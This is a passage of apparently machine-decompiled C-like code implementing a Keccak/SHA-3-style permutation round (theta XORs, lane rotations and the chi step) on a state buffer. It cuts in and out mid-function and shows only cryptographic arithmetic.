                                                                                                                                                            					_t1424 = _t1051 >> 0x0000001f | _t722 + _t722;
                                                                                                                                                            					_t96 =  &(_t985[2]); // 0x852d72fe
                                                                                                                                                            					_t97 =  &(_t985[3]); // 0x561174f6
                                                                                                                                                            					_t985[2] = _t1424 ^  *_t96 ^ _v20;
                                                                                                                                                            					_t985[3] = _t1316 ^  *_t97 ^ _v16;
                                                                                                                                                            					_t102 =  &(_t985[0xc]); // 0x89fe2bc6
                                                                                                                                                            					_t103 =  &(_t985[0xd]); // 0xceeb0845
                                                                                                                                                            					_t985[0xc] = _t1424 ^  *_t102 ^ _v20;
                                                                                                                                                            					_t985[0xd] = _t1316 ^  *_t103 ^ _v16;
                                                                                                                                                            					_t985[0x16] = _t985[0x16] ^ _t1424 ^ _v20;
                                                                                                                                                            					_t985[0x17] = _t985[0x17] ^ _t1316 ^ _v16;
                                                                                                                                                            					_t985[0x20] = _t985[0x20] ^ _t1424 ^ _v20;
                                                                                                                                                            					_t1066 = _t985;
                                                                                                                                                            					_t1066[0x21] = _t1066[0x21] ^ _t1316 ^ _v16;
                                                                                                                                                            					_t1066[0x2a] = _t1066[0x2a] ^ _t1424 ^ _v20;
                                                                                                                                                            					_t1066[0x2b] = _t1066[0x2b] ^ _t1316 ^ _v16;
                                                                                                                                                            					_t1067 = _v36;
                                                                                                                                                            					_t736 = _v32;
                                                                                                                                                            					_t1428 = _t1067 >> 0x0000001f | _t736 + _t736;
                                                                                                                                                            					_t1319 = (_t1067 << 0x00000020 | _t736) << 1;
                                                                                                                                                            					_t132 =  &(_t985[4]); // 0xff348d8d
                                                                                                                                                            					_t133 =  &(_t985[5]); // 0x5051ffff
                                                                                                                                                            					_t985[4] = _t1428 ^  *_t132 ^ _v24;
                                                                                                                                                            					_t985[5] = _t1319 ^  *_t133 ^ _v28;
                                                                                                                                                            					_t138 =  &(_t985[0xe]); // 0x1174ff85
                                                                                                                                                            					_t139 =  &(_t985[0xf]); // 0x34958d57
                                                                                                                                                            					_t985[0xe] = _t1428 ^  *_t138 ^ _v24;
                                                                                                                                                            					_t985[0xf] = _t1319 ^  *_t139 ^ _v28;
                                                                                                                                                            					_t144 =  &(_t985[0x18]); // 0x5fffc883
                                                                                                                                                            					_t145 =  &(_t985[0x19]); // 0xe58b5b5e
                                                                                                                                                            					_t985[0x18] = _t1428 ^  *_t144 ^ _v24;
                                                                                                                                                            					_t985[0x19] = _t1319 ^  *_t145 ^ _v28;
                                                                                                                                                            					_t150 =  &(_t985[0x22]); // 0x88
                                                                                                                                                            					_t151 =  &(_t985[0x23]); // 0xb09e33
                                                                                                                                                            					_t985[0x22] = _t1428 ^  *_t150 ^ _v24;
                                                                                                                                                            					_t1084 = _t985;
                                                                                                                                                            					_t986 = _v8;
                                                                                                                                                            					_t1084[0x23] = _t1319 ^  *_t151 ^ _v28;
                                                                                                                                                            					_t157 =  &(_t1084[0x2c]); // 0xa48e
                                                                                                                                                            					_t158 =  &(_t1084[0x2d]); // 0x14568b00
                                                                                                                                                            					_t1084[0x2c] = _t1428 ^  *_t157 ^ _v24;
                                                                                                                                                            					_t1084[0x2d] = _t1319 ^  *_t158 ^ _v28;
                                                                                                                                                            					_t1323 = (_t986 << 0x00000020 | _t1380) << 1;
                                                                                                                                                            					_t988 = _v40;
                                                                                                                                                            					_t1433 = _t986 >> 0x0000001f | _t1380 + _t1380;
                                                                                                                                                            					_t1382 = _a4;
                                                                                                                                                            					 *(_t1382 + 0x18) =  *(_t1382 + 0x18) ^ _t1433 ^ _v12;
                                                                                                                                                            					 *(_t1382 + 0x1c) =  *(_t1382 + 0x1c) ^ _t1323 ^ _t988;
                                                                                                                                                            					_t174 = _t1382 + 0x40; // 0x52ffffff
                                                                                                                                                            					_t176 = _t1382 + 0x44; // 0x9c98e850
                                                                                                                                                            					 *(_t1382 + 0x40) = _t1433 ^  *_t174 ^ _v12;
                                                                                                                                                            					 *(_t1382 + 0x44) = _t1323 ^  *_t176 ^ _t988;
                                                                                                                                                            					_t179 = _t1382 + 0x68; // 0x8b55c35d
                                                                                                                                                            					_t180 = _t1382 + 0x6c; // 0x28ec83ec
                                                                                                                                                            					 *(_t1382 + 0x68) = _t1433 ^  *_t179 ^ _v12;
                                                                                                                                                            					 *(_t1382 + 0x6c) = _t1323 ^  *_t180 ^ _t988;
                                                                                                                                                            					_t184 = _t1382 + 0x90; // 0x68b0000
                                                                                                                                                            					_t185 = _t1382 + 0x94; // 0x33284633
                                                                                                                                                            					 *(_t1382 + 0x90) = _t1433 ^  *_t184 ^ _v12;
                                                                                                                                                            					_t1099 = _t1382;
                                                                                                                                                            					 *(_t1099 + 0x94) = _t1323 ^  *_t185 ^ _t988;
                                                                                                                                                            					_t189 = _t1099 + 0xb8; // 0x333c5633
                                                                                                                                                            					_t190 = _t1099 + 0xbc; // 0x96336456
                                                                                                                                                            					 *(_t1099 + 0xb8) = _t1433 ^  *_t189 ^ _v12;
                                                                                                                                                            					_t989 = _t1382;
                                                                                                                                                            					 *(_t1099 + 0xbc) = _t1323 ^  *_t190 ^ _t988;
                                                                                                                                                            					_t1100 = _v16;
                                                                                                                                                            					_t768 = _v20;
                                                                                                                                                            					_t1327 = (_t1100 << 0x00000020 | _t768) << 1;
                                                                                                                                                            					_t1438 = _t1100 >> 0x0000001f | _t768 + _t768;
                                                                                                                                                            					_t200 = _t989 + 0x24; // 0xe850ffff
                                                                                                                                                            					_t201 = _t989 + 0x20; // 0xff34858d
                                                                                                                                                            					 *(_t989 + 0x20) = _t1438 ^  *_t201 ^ _v32;
                                                                                                                                                            					_t990 = _v36;
                                                                                                                                                            					 *(_t989 + 0x24) = _t1327 ^  *_t200 ^ _v36;
                                                                                                                                                            					 *(_t1382 + 0x48) =  *(_t1382 + 0x48) ^ _t1438 ^ _v32;
                                                                                                                                                            					 *(_t1382 + 0x4c) =  *(_t1382 + 0x4c) ^ _t1327 ^ _t990;
                                                                                                                                                            					_t212 = _t1382 + 0x70; // 0x758b5653
                                                                                                                                                            					_t213 = _t1382 + 0x74; // 0x45c75708
                                                                                                                                                            					 *(_t1382 + 0x70) = _t1438 ^  *_t212 ^ _v32;
                                                                                                                                                            					 *(_t1382 + 0x74) = _t1327 ^  *_t213 ^ _t990;
                                                                                                                                                            					_t217 = _t1382 + 0x98; // 0x46335046
                                                                                                                                                            					_t219 = _t1382 + 0x9c; // 0xa0863378
                                                                                                                                                            					 *(_t1382 + 0x98) = _t1438 ^  *_t217 ^ _v32;
                                                                                                                                                            					_t1116 = _t1382;
                                                                                                                                                            					 *(_t1116 + 0x9c) = _t1327 ^  *_t219 ^ _t990;
                                                                                                                                                            					_t222 = _t1116 + 0xc0; // 0x8c
                                                                                                                                                            					_t223 = _t1116 + 0xc4; // 0xb49633
                                                                                                                                                            					 *(_t1116 + 0xc0) = _t1438 ^  *_t222 ^ _v32;
                                                                                                                                                            					 *(_t1116 + 0xc4) = _t1327 ^  *_t223 ^ _t990;
                                                                                                                                                            					_t227 = _t1116 + 8; // 0x852d72fe
                                                                                                                                                            					_t1441 =  *_t227;
                                                                                                                                                            					_t228 = _t1116 + 0xc; // 0x561174f6
                                                                                                                                                            					_t1330 =  *_t228;
                                                                                                                                                            					_t229 = _t1116 + 0x50; // 0xffff34bd
                                                                                                                                                            					_t991 =  *_t229;
                                                                                                                                                            					_t230 = _t1116 + 0x54; // 0xc8b9ff
                                                                                                                                                            					_t1383 =  *_t230;
                                                                                                                                                            					_t1443 = _a4;
                                                                                                                                                            					 *(_t1443 + 0x50) = _t1330 >> 0x0000001f | _t1441 + _t1441;
                                                                                                                                                            					 *(_t1443 + 0x54) = (_t1330 << 0x00000020 | _t1441) << 1;
                                                                                                                                                            					_t238 = _t1443 + 0x38; // 0x1174ff85
                                                                                                                                                            					_t239 = _t1443 + 0x3c; // 0x34958d57
                                                                                                                                                            					_t1332 =  *_t239;
                                                                                                                                                            					_v40 =  *_t238;
                                                                                                                                                            					 *(_t1443 + 0x3c) = (_t1383 << 0x00000020 | _t991) << 3;
                                                                                                                                                            					 *(_t1443 + 0x38) = _t1383 >> 0x0000001d | _t991 << 0x00000003;
                                                                                                                                                            					_t247 = _t1443 + 0x58; // 0xaaf30000
                                                                                                                                                            					_t1385 =  *_t247;
                                                                                                                                                            					_t248 = _t1443 + 0x5c; // 0x3ebc033
                                                                                                                                                            					_t1444 =  *_t248;
                                                                                                                                                            					_t993 = _v40;
                                                                                                                                                            					_t1334 = _a4;
                                                                                                                                                            					 *(_t1334 + 0x58) = _t1332 >> 0x0000001a | _t993 << 0x00000006;
                                                                                                                                                            					 *(_t1334 + 0x5c) = (_t1332 << 0x00000020 | _t993) << 6;
                                                                                                                                                            					_t257 = _t1334 + 0x88; // 0x88
                                                                                                                                                            					_t995 =  *_t257;
                                                                                                                                                            					_t258 = _t1334 + 0x8c; // 0xb09e33
                                                                                                                                                            					_t1335 =  *_t258;
                                                                                                                                                            					_t1446 = _a4;
                                                                                                                                                            					 *(_t1446 + 0x88) = _t1444 >> 0x00000016 | _t1385 << 0x0000000a;
                                                                                                                                                            					 *(_t1446 + 0x8c) = (_t1444 << 0x00000020 | _t1385) << 0xa;
                                                                                                                                                            					_t266 = _t1446 + 0x90; // 0x68b0000
                                                                                                                                                            					_t1387 =  *_t266;
                                                                                                                                                            					_t267 = _t1446 + 0x94; // 0x33284633
                                                                                                                                                            					_t1447 =  *_t267;
                                                                                                                                                            					_t1337 = _a4;
                                                                                                                                                            					 *(_t1337 + 0x90) = _t1335 >> 0x00000011 | _t995 << 0x0000000f;
                                                                                                                                                            					 *(_t1337 + 0x94) = (_t1335 << 0x00000020 | _t995) << 0xf;
                                                                                                                                                            					_t275 = _t1337 + 0x18; // 0xff9cc5e8
                                                                                                                                                            					_t997 =  *_t275;
                                                                                                                                                            					_t276 = _t1337 + 0x1c; // 0xcc483ff
                                                                                                                                                            					_t1338 =  *_t276;
                                                                                                                                                            					_t1449 = _a4;
                                                                                                                                                            					 *(_t1449 + 0x18) = _t1447 >> 0x0000000b | _t1387 << 0x00000015;
                                                                                                                                                            					 *(_t1449 + 0x1c) = (_t1447 << 0x00000020 | _t1387) << 0x15;
                                                                                                                                                            					_t284 = _t1449 + 0x28; // 0x3e
                                                                                                                                                            					_t1389 =  *_t284;
                                                                                                                                                            					_t285 = _t1449 + 0x2c; // 0x308458b
                                                                                                                                                            					_t1450 =  *_t285;
                                                                                                                                                            					_t1340 = _a4;
                                                                                                                                                            					 *(_t1340 + 0x28) = _t1338 >> 0x00000004 | _t997 << 0x0000001c;
                                                                                                                                                            					 *(_t1340 + 0x2c) = (_t1338 << 0x00000020 | _t997) << 0x1c;
                                                                                                                                                            					_t293 = _t1340 + 0x80; // 0x33385e33
                                                                                                                                                            					_t999 =  *_t293;
                                                                                                                                                            					_t294 = _t1340 + 0x84; // 0x9e33605e
                                                                                                                                                            					_t1341 =  *_t294;
                                                                                                                                                            					_t1452 = _a4;
                                                                                                                                                            					 *(_t1452 + 0x84) = _t1389 << 0x00000004 | _t1450 >> 0x0000001c;
                                                                                                                                                            					 *(_t1452 + 0x80) = (_t1450 << 0x00000020 | _t1389) >> 0x1c;
                                                                                                                                                            					_t302 = _t1452 + 0x40; // 0x52ffffff
                                                                                                                                                            					_t1391 =  *_t302;
                                                                                                                                                            					_t303 = _t1452 + 0x44; // 0x9c98e850
                                                                                                                                                            					_t1453 =  *_t303;
                                                                                                                                                            					_t1343 = _a4;
                                                                                                                                                            					 *(_t1343 + 0x44) = _t999 << 0x0000000d | _t1341 >> 0x00000013;
                                                                                                                                                            					 *(_t1343 + 0x40) = (_t1341 << 0x00000020 | _t999) >> 0x13;
                                                                                                                                                            					_t311 = _t1343 + 0xa8; // 0x544e332c
                                                                                                                                                            					_t1001 =  *_t311;
                                                                                                                                                            					_t312 = _t1343 + 0xac; // 0x337c4e33
                                                                                                                                                            					_t1344 =  *_t312;
                                                                                                                                                            					_t1455 = _a4;
                                                                                                                                                            					 *(_t1455 + 0xac) = _t1391 << 0x00000017 | _t1453 >> 0x00000009;
                                                                                                                                                            					 *(_t1455 + 0xa8) = (_t1453 << 0x00000020 | _t1391) >> 9;
                                                                                                                                                            					_t320 = _t1455 + 0xc0; // 0x8c
                                                                                                                                                            					_t1393 =  *_t320;
                                                                                                                                                            					_t321 = _t1455 + 0xc4; // 0xb49633
                                                                                                                                                            					_t1456 =  *_t321;
                                                                                                                                                            					_t1346 = _a4;
                                                                                                                                                            					 *(_t1346 + 0xc0) = _t1344 >> 0x0000001e | _t1001 << 0x00000002;
                                                                                                                                                            					 *(_t1346 + 0xc4) = (_t1344 << 0x00000020 | _t1001) << 2;
                                                                                                                                                            					_t329 = _t1346 + 0x20; // 0xff34858d
                                                                                                                                                            					_t1003 =  *_t329;
                                                                                                                                                            					_t330 = _t1346 + 0x24; // 0xe850ffff
                                                                                                                                                            					_t1347 =  *_t330;
                                                                                                                                                            					_t1458 = _a4;
                                                                                                                                                            					 *(_t1458 + 0x20) = _t1456 >> 0x00000012 | _t1393 << 0x0000000e;
                                                                                                                                                            					 *(_t1458 + 0x24) = (_t1456 << 0x00000020 | _t1393) << 0xe;
                                                                                                                                                            					_t338 = _t1458 + 0x78; // 0x9cfb38d8
                                                                                                                                                            					_t1395 =  *_t338;
                                                                                                                                                            					_t339 = _t1458 + 0x7c; // 0x105e8b00
                                                                                                                                                            					_t1459 =  *_t339;
                                                                                                                                                            					_t1349 = _a4;
                                                                                                                                                            					 *(_t1349 + 0x78) = _t1347 >> 0x00000005 | _t1003 << 0x0000001b;
                                                                                                                                                            					 *(_t1349 + 0x7c) = (_t1347 << 0x00000020 | _t1003) << 0x1b;
                                                                                                                                                            					_t347 = _t1349 + 0xb8; // 0x333c5633
                                                                                                                                                            					_t1005 =  *_t347;
                                                                                                                                                            					_t348 = _t1349 + 0xbc; // 0x96336456
                                                                                                                                                            					_t1350 =  *_t348;
                                                                                                                                                            					_t1461 = _a4;
                                                                                                                                                            					 *(_t1461 + 0xbc) = _t1395 << 0x00000009 | _t1459 >> 0x00000017;
                                                                                                                                                            					 *(_t1461 + 0xb8) = (_t1459 << 0x00000020 | _t1395) >> 0x17;
                                                                                                                                                            					_t356 = _t1461 + 0x98; // 0x46335046
                                                                                                                                                            					_t1397 =  *_t356;
                                                                                                                                                            					_t357 = _t1461 + 0x9c; // 0xa0863378
                                                                                                                                                            					_t1462 =  *_t357;
                                                                                                                                                            					_t1352 = _a4;
                                                                                                                                                            					 *(_t1352 + 0x9c) = _t1005 << 0x00000018 | _t1350 >> 0x00000008;
                                                                                                                                                            					 *(_t1352 + 0x98) = (_t1350 << 0x00000020 | _t1005) >> 8;
                                                                                                                                                            					_t365 = _t1352 + 0x68; // 0x8b55c35d
                                                                                                                                                            					_t1007 =  *_t365;
                                                                                                                                                            					_t366 = _t1352 + 0x6c; // 0x28ec83ec
                                                                                                                                                            					_t1353 =  *_t366;
                                                                                                                                                            					_t1464 = _a4;
                                                                                                                                                            					 *(_t1464 + 0x68) = _t1462 >> 0x00000018 | _t1397 << 0x00000008;
                                                                                                                                                            					 *(_t1464 + 0x6c) = (_t1462 << 0x00000020 | _t1397) << 8;
                                                                                                                                                            					_t374 = _t1464 + 0x60; // 0x5fffc883
                                                                                                                                                            					_t1399 =  *_t374;
                                                                                                                                                            					_t375 = _t1464 + 0x64; // 0xe58b5b5e
                                                                                                                                                            					_t1465 =  *_t375;
                                                                                                                                                            					_t1355 = _a4;
                                                                                                                                                            					 *(_t1355 + 0x60) = _t1353 >> 0x00000007 | _t1007 << 0x00000019;
                                                                                                                                                            					 *(_t1355 + 0x64) = (_t1353 << 0x00000020 | _t1007) << 0x19;
                                                                                                                                                            					_t383 = _t1355 + 0x10; // 0xff348d8d
                                                                                                                                                            					_t1009 =  *_t383;
                                                                                                                                                            					_t384 = _t1355 + 0x14; // 0x5051ffff
                                                                                                                                                            					_t1356 =  *_t384;
                                                                                                                                                            					_t1467 = _a4;
                                                                                                                                                            					 *(_t1467 + 0x14) = _t1399 << 0x0000000b | _t1465 >> 0x00000015;
                                                                                                                                                            					 *(_t1467 + 0x10) = (_t1465 << 0x00000020 | _t1399) >> 0x15;
                                                                                                                                                            					_t392 = _t1467 + 0xa0; // 0x8b000000
                                                                                                                                                            					_t1401 =  *_t392;
                                                                                                                                                            					_t393 = _t1467 + 0xa4; // 0x4e33044e
                                                                                                                                                            					_t1468 =  *_t393;
                                                                                                                                                            					_t1358 = _a4;
                                                                                                                                                            					 *(_t1358 + 0xa0) = (_t1356 << 0x00000020 | _t1009) >> 2;
                                                                                                                                                            					 *(_t1358 + 0xa4) = _t1009 << 0x0000001e | _t1356 >> 0x00000002;
                                                                                                                                                            					_t401 = _t1358 + 0x70; // 0x758b5653
                                                                                                                                                            					_t1011 =  *_t401;
                                                                                                                                                            					_t402 = _t1358 + 0x74; // 0x45c75708
                                                                                                                                                            					_t1359 =  *_t402;
                                                                                                                                                            					_t1403 = _a4;
                                                                                                                                                            					 *(_t1403 + 0x70) = _t1468 >> 0x0000000e | _t1401 << 0x00000012;
                                                                                                                                                            					 *(_t1403 + 0x74) = (_t1468 << 0x00000020 | _t1401) << 0x12;
                                                                                                                                                            					_t410 = _t1403 + 0xb0; // 0xa48e
                                                                                                                                                            					_t411 = _t1403 + 0xb4; // 0x14568b00
                                                                                                                                                            					_t1470 =  *_t411;
                                                                                                                                                            					_v40 =  *_t410;
                                                                                                                                                            					 *(_t1403 + 0xb0) = (_t1359 << 0x00000020 | _t1011) >> 0x19;
                                                                                                                                                            					 *(_t1403 + 0xb4) = _t1011 << 0x00000007 | _t1359 >> 0x00000019;
                                                                                                                                                            					_t419 = _t1403 + 0x48; // 0xc483ffff
                                                                                                                                                            					_t1013 =  *_t419;
                                                                                                                                                            					_t420 = _t1403 + 0x4c; // 0x8dc0320c
                                                                                                                                                            					_t1404 =  *_t420;
                                                                                                                                                            					_t1361 = _v40;
                                                                                                                                                            					_t1363 = _a4;
                                                                                                                                                            					 *(_t1363 + 0x4c) = _t1361 << 0x0000001d | _t1470 >> 0x00000003;
                                                                                                                                                            					 *(_t1363 + 0x48) = (_t1470 << 0x00000020 | _t1361) >> 3;
                                                                                                                                                            					_t429 = _t1363 + 0x30; // 0x89fe2bc6
                                                                                                                                                            					_t1472 =  *_t429;
                                                                                                                                                            					_t430 = _t1363 + 0x34; // 0xceeb0845
                                                                                                                                                            					_t1364 =  *_t430;
                                                                                                                                                            					_t1406 = _a4;
                                                                                                                                                            					 *(_t1406 + 0x30) = _t1404 >> 0x0000000c | _t1013 << 0x00000014;
                                                                                                                                                            					 *(_t1406 + 0x34) = (_t1404 << 0x00000020 | _t1013) << 0x14;
                                                                                                                                                            					 *(_t1406 + 8) = (_t1364 << 0x00000020 | _t1472) >> 0x14;
                                                                                                                                                            					 *(_t1406 + 0xc) = _t1472 << 0x0000000c | _t1364 >> 0x00000014;
                                                                                                                                                            					_t444 = _t1406 + 8; // 0x852d72fe
                                                                                                                                                            					_t1189 =  *_t444;
                                                                                                                                                            					_t445 = _t1406 + 0x18; // 0xff9cc5e8
                                                                                                                                                            					_t446 = _t1406 + 0x10; // 0xff348d8d
                                                                                                                                                            					_t1474 =  *_t446;
                                                                                                                                                            					_t447 = _t1406 + 0x14; // 0x5051ffff
                                                                                                                                                            					_t1366 =  *_t447;
                                                                                                                                                            					_v36 =  *_t1406;
                                                                                                                                                            					_t449 = _t1406 + 4; // 0x3b590845
                                                                                                                                                            					_v32 =  *_t449;
                                                                                                                                                            					_t451 = _t1406 + 0xc; // 0x561174f6
                                                                                                                                                            					_t452 = _t1406 + 0x1c; // 0xcc483ff
                                                                                                                                                            					_t1407 =  *_t452;
                                                                                                                                                            					_v28 =  *_t451;
                                                                                                                                                            					_t836 = _a4;
                                                                                                                                                            					_v16 = _t1189;
                                                                                                                                                            					_v40 =  *_t445;
                                                                                                                                                            					_t458 = _t836 + 0x20; // 0xff34858d
                                                                                                                                                            					_t1016 = _a4;
                                                                                                                                                            					_v24 =  *_t458;
                                                                                                                                                            					_t462 =  &(_a4[9]); // 0xe850ffff
                                                                                                                                                            					_v20 =  *_t462;
                                                                                                                                                            					 *_t1016 =  !_t1189 & _t1474 ^ _v36;
                                                                                                                                                            					_t1016[1] =  !_v28 & _t1366 ^ _v32;
                                                                                                                                                            					_t1016[2] =  !_t1474 & _v40 ^ _v16;
                                                                                                                                                            					_t1016[3] =  !_t1366 & _t1407 ^ _v28;
                                                                                                                                                            					_t1367 = _t1016;
                                                                                                                                                            					_t1367[5] =  !_t1407 & _v20 ^ _t1366;
                                                                                                                                                            					_t1367[4] =  !_v40 & _v24 ^ _t1474;
                                                                                                                                                            					_t1408 = _t1367;
                                                                                                                                                            					_t1408[7] =  !_v20 & _v32 ^ _t1407;
                                                                                                                                                            					_t1408[6] =  !_v24 & _v36 ^ _v40;
                                                                                                                                                            					_t1408[9] =  !_v32 & _v28 ^ _v20;
                                                                                                                                                            					_t1408[8] =  !_v36 & _v16 ^ _v24;
                                                                                                                                                            					_t492 =  &(_t1408[0xa]); // 0x3e
                                                                                                                                                            					_t493 =  &(_t1408[0xc]); // 0x89fe2bc6
                                                                                                                                                            					_t1211 =  *_t493;
                                                                                                                                                            					_t494 =  &(_t1408[0x10]); // 0x52ffffff
                                                                                                                                                            					_t495 =  &(_t1408[0xe]); // 0x1174ff85
                                                                                                                                                            					_t1475 =  *_t495;
                                                                                                                                                            					_t496 =  &(_t1408[0xf]); // 0x34958d57
                                                                                                                                                            					_t1368 =  *_t496;
                                                                                                                                                            					_v36 =  *_t492;
                                                                                                                                                            					_t498 =  &(_t1408[0xb]); // 0x308458b
                                                                                                                                                            					_v32 =  *_t498;
                                                                                                                                                            					_t500 =  &(_t1408[0xd]); // 0xceeb0845
                                                                                                                                                            					_t501 =  &(_t1408[0x11]); // 0x9c98e850
                                                                                                                                                            					_t1409 =  *_t501;
                                                                                                                                                            					_v28 =  *_t500;
                                                                                                                                                            					_t863 = _a4;
                                                                                                                                                            					_v16 = _t1211;
                                                                                                                                                            					_v40 =  *_t494;
                                                                                                                                                            					_t507 = _t863 + 0x48; // 0xc483ffff
                                                                                                                                                            					_t1018 = _a4;
                                                                                                                                                            					_v24 =  *_t507;
                                                                                                                                                            					_t511 =  &(_a4[0x13]); // 0x8dc0320c
                                                                                                                                                            					_v20 =  *_t511;
                                                                                                                                                            					 *(_t1018 + 0x28) =  !_t1211 & _t1475 ^ _v36;
                                                                                                                                                            					 *(_t1018 + 0x2c) =  !_v28 & _t1368 ^ _v32;
                                                                                                                                                            					 *(_t1018 + 0x30) =  !_t1475 & _v40 ^ _v16;
                                                                                                                                                            					 *(_t1018 + 0x34) =  !_t1368 & _t1409 ^ _v28;
                                                                                                                                                            					_t1369 = _t1018;
                                                                                                                                                            					 *(_t1369 + 0x3c) =  !_t1409 & _v20 ^ _t1368;
                                                                                                                                                            					 *(_t1369 + 0x38) =  !_v40 & _v24 ^ _t1475;
                                                                                                                                                            					_t1410 = _t1369;
                                                                                                                                                            					 *(_t1410 + 0x40) =  !_v24 & _v36 ^ _v40;
                                                                                                                                                            					 *(_t1410 + 0x44) =  !_v20 & _v32 ^ _t1409;
                                                                                                                                                            					 *(_t1410 + 0x48) =  !_v36 & _v16 ^ _v24;
                                                                                                                                                            					 *(_t1410 + 0x4c) =  !_v32 & _v28 ^ _v20;
                                                                                                                                                            					_t542 = _t1410 + 0x50; // 0xffff34bd
                                                                                                                                                            					_t543 = _t1410 + 0x58; // 0xaaf30000
                                                                                                                                                            					_t1233 =  *_t543;
                                                                                                                                                            					_t544 = _t1410 + 0x68; // 0x8b55c35d
                                                                                                                                                            					_t545 = _t1410 + 0x60; // 0x5fffc883
                                                                                                                                                            					_t1476 =  *_t545;
                                                                                                                                                            					_t546 = _t1410 + 0x64; // 0xe58b5b5e
                                                                                                                                                            					_t1370 =  *_t546;
                                                                                                                                                            					_v36 =  *_t542;
                                                                                                                                                            					_t548 = _t1410 + 0x54; // 0xc8b9ff
                                                                                                                                                            					_v32 =  *_t548;
                                                                                                                                                            					_t550 = _t1410 + 0x5c; // 0x3ebc033
                                                                                                                                                            					_t551 = _t1410 + 0x6c; // 0x28ec83ec
                                                                                                                                                            					_t1411 =  *_t551;
                                                                                                                                                            					_v28 =  *_t550;
                                                                                                                                                            					_t890 = _a4;
                                                                                                                                                            					_v16 = _t1233;
                                                                                                                                                            					_v40 =  *_t544;
                                                                                                                                                            					_t557 = _t890 + 0x70; // 0x758b5653
                                                                                                                                                            					_t1020 = _a4;
                                                                                                                                                            					_v24 =  *_t557;
                                                                                                                                                            					_t561 =  &(_a4[0x1d]); // 0x45c75708
                                                                                                                                                            					 *(_t1020 + 0x50) =  !_t1233 & _t1476 ^ _v36;
                                                                                                                                                            					_v20 =  *_t561;
                                                                                                                                                            					 *(_t1020 + 0x54) =  !_v28 & _t1370 ^ _v32;
                                                                                                                                                            					 *(_t1020 + 0x58) =  !_t1476 & _v40 ^ _v16;
                                                                                                                                                            					 *(_t1020 + 0x5c) =  !_t1370 & _t1411 ^ _v28;
                                                                                                                                                            					_t1371 = _t1020;
                                                                                                                                                            					 *(_t1371 + 0x60) =  !_v40 & _v24 ^ _t1476;
                                                                                                                                                            					 *(_t1371 + 0x64) =  !_t1411 & _v20 ^ _t1370;
                                                                                                                                                            					_t1412 = _t1371;
                                                                                                                                                            					 *(_t1412 + 0x68) =  !_v24 & _v36 ^ _v40;
                                                                                                                                                            					 *(_t1412 + 0x6c) =  !_v20 & _v32 ^ _t1411;
                                                                                                                                                            					 *(_t1412 + 0x70) =  !_v36 & _v16 ^ _v24;
                                                                                                                                                            					 *(_t1412 + 0x74) =  !_v32 & _v28 ^ _v20;
                                                                                                                                                            					_t592 = _t1412 + 0x78; // 0x9cfb38d8
                                                                                                                                                            					_t593 = _t1412 + 0x80; // 0x33385e33
                                                                                                                                                            					_t1255 =  *_t593;
                                                                                                                                                            					_t594 = _t1412 + 0x90; // 0x68b0000
                                                                                                                                                            					_t595 = _t1412 + 0x88; // 0x88
                                                                                                                                                            					_t1477 =  *_t595;
                                                                                                                                                            					_t596 = _t1412 + 0x8c; // 0xb09e33
                                                                                                                                                            					_t1372 =  *_t596;
                                                                                                                                                            					_v36 =  *_t592;
                                                                                                                                                            					_t598 = _t1412 + 0x7c; // 0x105e8b00
                                                                                                                                                            					_v32 =  *_t598;
                                                                                                                                                            					_t600 = _t1412 + 0x84; // 0x9e33605e
                                                                                                                                                            					_t601 = _t1412 + 0x94; // 0x33284633
                                                                                                                                                            					_t1413 =  *_t601;
                                                                                                                                                            					_v28 =  *_t600;
                                                                                                                                                            					_t917 = _a4;
                                                                                                                                                            					_v16 = _t1255;
                                                                                                                                                            					_v40 =  *_t594;
                                                                                                                                                            					_t607 = _t917 + 0x98; // 0x46335046
                                                                                                                                                            					_t1022 = _a4;
                                                                                                                                                            					_v24 =  *_t607;
                                                                                                                                                            					_t611 =  &(_a4[0x27]); // 0xa0863378
                                                                                                                                                            					 *(_t1022 + 0x78) =  !_t1255 & _t1477 ^ _v36;
                                                                                                                                                            					_v20 =  *_t611;
                                                                                                                                                            					 *(_t1022 + 0x7c) =  !_v28 & _t1372 ^ _v32;
                                                                                                                                                            					 *(_t1022 + 0x80) =  !_t1477 & _v40 ^ _v16;
                                                                                                                                                            					 *(_t1022 + 0x84) =  !_t1372 & _t1413 ^ _v28;
                                                                                                                                                            					_t1373 = _t1022;
                                                                                                                                                            					 *(_t1373 + 0x88) =  !_v40 & _v24 ^ _t1477;
                                                                                                                                                            					 *(_t1373 + 0x8c) =  !_t1413 & _v20 ^ _t1372;
                                                                                                                                                            					_t1414 = _t1373;
                                                                                                                                                            					 *(_t1414 + 0x90) =  !_v24 & _v36 ^ _v40;
                                                                                                                                                            					 *(_t1414 + 0x94) =  !_v20 & _v32 ^ _t1413;
                                                                                                                                                            					 *(_t1414 + 0x98) =  !_v36 & _v16 ^ _v24;
                                                                                                                                                            					 *(_t1414 + 0x9c) =  !_v32 & _v28 ^ _v20;
                                                                                                                                                            					_t642 = _t1414 + 0xa0; // 0x8b000000
                                                                                                                                                            					_t643 = _t1414 + 0xa8; // 0x544e332c
                                                                                                                                                            					_t1277 =  *_t643;
                                                                                                                                                            					_t644 = _t1414 + 0xb0; // 0xa48e
                                                                                                                                                            					_t1478 =  *_t644;
                                                                                                                                                            					_t645 = _t1414 + 0xb8; // 0x333c5633
                                                                                                                                                            					_v36 =  *_t642;
                                                                                                                                                            					_t647 = _t1414 + 0xa4; // 0x4e33044e
                                                                                                                                                            					_t648 = _t1414 + 0xb4; // 0x14568b00
                                                                                                                                                            					_t1374 =  *_t648;
                                                                                                                                                            					_v32 =  *_t647;
                                                                                                                                                            					_t650 = _t1414 + 0xac; // 0x337c4e33
                                                                                                                                                            					_t651 = _t1414 + 0xbc; // 0x96336456
                                                                                                                                                            					_t1415 =  *_t651;
                                                                                                                                                            					_v28 =  *_t650;
                                                                                                                                                            					_t944 = _a4;
                                                                                                                                                            					_v16 = _t1277;
                                                                                                                                                            					_v40 =  *_t645;
                                                                                                                                                            					_t657 = _t944 + 0xc0; // 0x8c
                                                                                                                                                            					_t1024 = _a4;
                                                                                                                                                            					_v24 =  *_t657;
                                                                                                                                                            					_t661 =  &(_a4[0x31]); // 0xb49633
                                                                                                                                                            					_t1024[0x28] =  !_t1277 & _t1478 ^ _v36;
                                                                                                                                                            					_v20 =  *_t661;
                                                                                                                                                            					_t1024[0x29] =  !_v28 & _t1374 ^ _v32;
                                                                                                                                                            					_t1024[0x2a] =  !_t1478 & _v40 ^ _v16;
                                                                                                                                                            					_t1024[0x2b] =  !_t1374 & _t1415 ^ _v28;
                                                                                                                                                            					_t1375 = _t1024;
